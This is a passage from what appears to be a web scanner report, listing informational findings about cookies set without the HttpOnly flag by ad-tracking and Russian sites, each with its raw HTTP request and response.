P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
17.121. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=627389121;fpan=1;fpa=P0-962486039-1303741255035;ns=1;url=http%3A%2F%2Fgoods.adnectar.com%2Fstatic%2Fquantcast_1.html;ref=http%3A%2F%2Fwww.livejournal.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303741255031;tzo=300;a=p-42U4PptTYmdC- HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2
Set-Cookie: d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

17.122. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=2939|1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C2%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
17.123. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:58 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21629
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/
Content-Type: application/smil
Content-Length: 3099
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360" ba
...[SNIP]...
17.124. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif?replay_count=0&volume=100 HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:54:01 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_0_232
Set-Cookie: ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
Location: http://ad.doubleclick.net/imp;v1;f;238884748;0-0;0;61850871;1|1;41734709|41752496|1;;cs=o;%3fhttp://ad.doubleclick.net/dot.gif?1303743241655
Content-Length: 0
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: image/gif

17.125. http://pogoda.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pogoda.webalta.ru
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>............ ...
...[SNIP]...
17.126. http://pretty.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
17.127. http://r2.mail.ru/b12179277.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179277.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179277.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: image/gif
Content-Length: 258
Connection: keep-alive
Set-Cookie: p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:20:49 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a..!...............................................................................................................................................................................................
...[SNIP]...
17.128. http://r2.mail.ru/b12179279.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179279.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179279.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 294
Connection: keep-alive
Set-Cookie: p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a{.......................8..P.....I..$..A...............!.......,....{......0.I..8.....!.di.h..l.....tm.x..|..@.DA,....r.l:...BR.Z...v..z.... .....z.n....|>.$...~.........    .......................
...[SNIP]...
17.129. http://r2.mail.ru/b12179280.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179280.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179280.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 70
Connection: keep-alive
Set-Cookie: p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a...................!.......,.............#....D-..,.i^'T....R..;
17.130. http://r2.mail.ru/b12201458.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12201458.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12201458.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 1232
Connection: keep-alive
Set-Cookie: p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR............e.t.....tEXtSoftware.Adobe ImageReadyq.e<...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
17.131. http://r2.mail.ru/b12526055.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526055.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526055.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/gif
Content-Length: 122
Connection: keep-alive
Set-Cookie: p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...K.....\.r.J...J.y.8...............49.............n..3V.>..i.Z....k...m..2...;
17.132. http://r2.mail.ru/b12526056.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526056.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526056.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3722
Connection: keep-alive
Set-Cookie: p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...
17.133. http://r2.mail.ru/b12526057.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526057.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526057.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2843
Connection: keep-alive
Set-Cookie: p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...
17.134. http://r2.mail.ru/b12526058.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526058.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526058.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3343
Connection: keep-alive
Set-Cookie: p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.0..
...[SNIP]...
17.135. http://r2.mail.ru/b12526059.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526059.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526059.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2876
Connection: keep-alive
